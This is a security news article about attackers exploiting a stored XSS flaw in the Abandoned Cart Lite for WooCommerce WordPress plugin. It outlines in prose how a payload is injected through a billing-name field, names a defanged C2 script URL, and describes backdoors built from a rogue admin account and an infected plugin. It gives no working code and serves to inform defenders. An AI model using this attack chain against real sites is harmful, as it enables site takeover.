Abandoned Cart for WooCommerce WordPress Plugin Exploited in Attacks

Unpatched versions of the Abandoned Cart for WooCommerce plugin for WordPress have been exploited in attacks, researchers say. Apparently, there’s a dangerous XSS (cross-site scripting) vulnerability in the plugin which affects both paid and free versions of the plugin.

Last month, a stored cross-site scripting (XSS) flaw was patched in version 5.2.0 of the popular WordPress plugin Abandoned Cart Lite For WooCommerce, said Wordfence researchers.

Abandoned Cart for WooCommerce WordPress Plugin Exploited in Attacks

The Abandoned Cart for WooCommerce plugin plugin is designed to help owners of WooCommerce sites to track abandoned shopping carts in order to recover those sales. However, researchers discovered “a lack of sanitation on both input and output” which allows attackers to inject malicious JavaScript payloads into various data fields. These payloads are set to execute when a logged-in user with administrator privileges views the list of abandoned carts from their WordPress dashboard.

How is the attack carried out? Cybercriminals create a cart with fake contact information, which is abandoned. According to the report, the names and emails are random, but the requests follow the same pattern: the generated first and last name are supplied together as billing_first_name, but the billing_last_name field contains the injected payload .

Have you heard of wix(.)com? is a cloud-based web development platform designed for users to build HTML5 web sites and mobile sites through the use of the company?s online drag and drop tools. Unfortunately, a serious XSS bug has...Read more
XSS Bug Found on Platform, Built on Open-Source WordPress Library.

Тhe shortener used in these attacks resolves to hXXps://cdn-bigcommerce[.]com/visionstat.js.

The domain, which attempts to look innocuous by impersonating the legitimate, points to the command and control (C2) server behind the infection. The target script, visionstat.js, is a malicious JavaScript payload which uses the victim’s own browser session to deploy backdoors on their site.

It should be noted that two backdoors are deployed in the attacks: a rogue administrator account is created, and a deactivated plugin is infected with a code execution script. Both of these actions are executed by creating a hidden iframe in the admin’s existing browser window, then simulating the process of filling out and submitting the necessary forms within it, researchers said.

The researchers had detected 5,251 accesses to the link associated with the attacks.

Milena Dimitrova

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the beginning. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share